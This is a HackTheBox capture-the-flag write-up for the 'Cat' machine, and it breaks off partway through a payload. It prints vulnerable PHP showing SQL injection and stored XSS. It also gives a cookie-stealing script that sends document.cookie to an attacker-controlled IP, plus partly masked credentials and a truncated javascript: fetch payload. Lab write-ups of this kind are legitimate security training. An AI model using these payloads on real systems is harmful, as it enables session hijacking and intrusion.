Cat Hackthebox Writeup
Cat Hackthebox Writeup
https://app.hackthebox.com/machines/Cat
When accessing port 80, we are redirected to cat.htb. Let’s immediately add an entry to /etc/hosts
echo "10.10.11.53 cat.htb" | sudo tee -a /etc/hosts
Using gittools, it is possible to extract files from .git repositories. This tool checks if directory mapping is enabled, and recursively loads the contents
of .git for further analysis.
After extraction we have access to the source code of the application. Let’s try to analyze it for vulnerabilities (We can throw it into SAST)
So for example when checking join.php you may notice that user data is directly stored in the database during registration and is not filtered in any
way. Which will lead to Stored XSS
And in accept_cat.php, you can see SQL injection, which occurs due to direct user input into SQL queries.
Vulnerable part of the code:
// VULNERABLE CODE:
$cat_name = $_POST['catName'];
$sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
$pdo->exec($sql_insert);
But accept_cat.php is available only to axel admin. It turns out that we need to get into the admin area via XSS (e.g. steal cookies), and therefore use
SQLi to get creds from the database.
Since we have nothing filtered, we can use the basic payload from the Portswigger Academy
<script>document.location='http://10.10.xx.xx:4444/?c='+document.cookie;</script>
Looking through the Apache log, we can find the credentials for the user Axel. (This is nicely highlighted by linpeas.sh)
axel:aNdZwgC4****************
It’s probably a hint about privilege escalation, but it’s a lot to read.
So let’s do the usual. We’ll find open ports and forward the web
ssh -L 3000:127.0.0.1:3000 [email protected]
Get index.php
<a href='javascript:fetch("http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md").then(response=
if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) ||
$_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {
header('Location: dashboard.php');
exit;